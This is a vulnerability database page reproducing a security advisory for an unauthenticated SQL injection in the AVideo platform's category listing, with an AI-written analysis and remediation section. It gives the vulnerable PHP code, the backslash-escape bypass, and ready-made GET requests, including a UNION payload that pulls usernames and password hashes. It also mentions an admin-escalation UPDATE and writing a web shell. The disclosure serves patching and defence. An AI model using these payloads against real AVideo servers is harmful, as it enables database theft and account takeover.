GHSA-4jw9-5hrc-m4j6
GHSA-5f7v-4f6g-74rj
GHSA-j9m2-xx67-38fc
GHSA-mcj5-6qr4-95fj
GHSA-xgxp-f695-6vrp
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4DescriptionGitHub Advisory
Summary
An unauthenticated SQL injection vulnerability exists in objects/category.php in the getAllCategories() method. The doNotShowCats request parameter is sanitized only by stripping single-quote characters (str_replace("'", '', ...)), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in objects/security.php.
Affected Component
File: objects/category.php, lines 386-394, inside method getAllCategories()
if (!empty($_REQUEST['doNotShowCats'])) {
$doNotShowCats = $_REQUEST['doNotShowCats'];
if (!is_array($_REQUEST['doNotShowCats'])) {
$doNotShowCats = array($_REQUEST['doNotShowCats']);
}
foreach ($doNotShowCats as $key => $value) {
$doNotShowCats[$key] = str_replace("'", '', $value); // INSUFFICIENT
}
$sql .= " AND (c.clean_name NOT IN ('" . implode("', '", $doNotShowCats) . "') )";
}Root Cause
- Incomplete sanitization: The only defense is
str_replace("'", '', $value), which strips single-quote characters. It does not strip backslashes (\). - No global filter coverage: The
doNotShowCatsparameter is absent from every filter list inobjects/security.php($securityFilter,$securityFilterInt,$securityRemoveSingleQuotes,$securityRemoveNonChars,$securityRemoveNonCharsStrict,$filterURL, and the_idsuffix pattern). - Direct string concatenation into SQL: The filtered values are concatenated into the SQL query via
implode()instead of using parameterized queries.
Exploitation
MySQL, by default, treats the backslash (\) as an escape character inside string literals (unless NO_BACKSLASH_ESCAPES SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that implode() adds, shifting the string boundary and turning the next array element into executable SQL.
Step-by-step:
- The attacker sends:
GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=)%20OR%201=1)--%20-- After
str_replace("'", '', ...), values are unchanged (no single quotes to strip):
- Element 0:
\ - Element 1:
) OR 1=1)-- -
- After
implode("', '", ...), the concatenated string is:
\', ') OR 1=1)-- -- The full SQL becomes:
AND (c.clean_name NOT IN ('\', ') OR 1=1)-- -') )- MySQL parses this as:
'\'- the\escapes the next', making it a literal quote character inside the string. The string continues., '- the comma and space are part of the string. The next'(which was the opening quote of element 1) closes the string.- String value =
',(three characters: quote, comma, space) ) OR 1=1)- executable SQL. The first)closesNOT IN (, the second)closes the outerAND (.-- -- SQL comment, discards the remainder') )
Effective SQL:
AND (c.clean_name NOT IN (', ') OR 1=1)This always evaluates to TRUE.
For data extraction (UNION-based):
GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-Produces:
AND (c.clean_name NOT IN ('\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )This appends a UNION query that extracts usernames and password hashes from the users table. The attacker must match the column count of the original SELECT (determinable through iterative probing).
Impact
- Confidentiality: Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.
- Integrity: Ability to modify or delete any data in the database via stacked queries or subqueries (e.g.,
UPDATE users SET isAdmin=1). - Availability: Ability to drop tables or corrupt data.
- Potential RCE: On MySQL configurations that allow
SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root.
Suggested Fix
Replace the string concatenation with parameterized queries:
if (!empty($_REQUEST['doNotShowCats'])) {
$doNotShowCats = $_REQUEST['doNotShowCats'];
if (!is_array($doNotShowCats)) {
$doNotShowCats = array($doNotShowCats);
}
$placeholders = array_fill(0, count($doNotShowCats), '?');
$formats = str_repeat('s', count($doNotShowCats));
$sql .= " AND (c.clean_name NOT IN (" . implode(',', $placeholders) . ") )";
// Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters
}Alternatively, use $global['mysqli']->real_escape_string() on each value as a minimum fix, though parameterized queries are strongly preferred.
AnalysisAI
An unauthenticated SQL injection vulnerability in AVideo allows remote attackers to execute arbitrary SQL queries through the doNotShowCats parameter in the getAllCategories() method. The vulnerability bypasses quote-stripping sanitization using backslash escape techniques, enabling attackers to extract sensitive data including user credentials, modify database contents, or potentially achieve remote code execution. No active exploitation has been reported in KEV, but proof-of-concept exploitation details are publicly available in the GitHub advisory.
Technical ContextAI
The vulnerability affects the AVideo video sharing platform (CPE: pkg:composer/wwbn_avideo) in the objects/category.php file. This is a classic SQL injection vulnerability (CWE-89) where user input is concatenated directly into SQL queries after insufficient sanitization that only removes single quotes but fails to handle backslash escape characters. In MySQL's default configuration, backslashes act as escape characters within string literals, allowing attackers to manipulate string boundaries and inject malicious SQL. The doNotShowCats parameter is not covered by any of the application's global security filters, making it particularly exposed to exploitation.
RemediationAI
Apply the vendor-provided patch that implements parameterized queries or proper input escaping for the doNotShowCats parameter. The fix involves replacing string concatenation with prepared statements using placeholders and bind parameters. As an immediate workaround until patching is possible, implement a Web Application Firewall (WAF) rule to block requests containing backslash characters in the doNotShowCats parameter, and restrict access to the affected endpoints to trusted IP ranges only. Monitor the vendor advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj for patch availability and additional guidance.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-89 – SQL Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-14013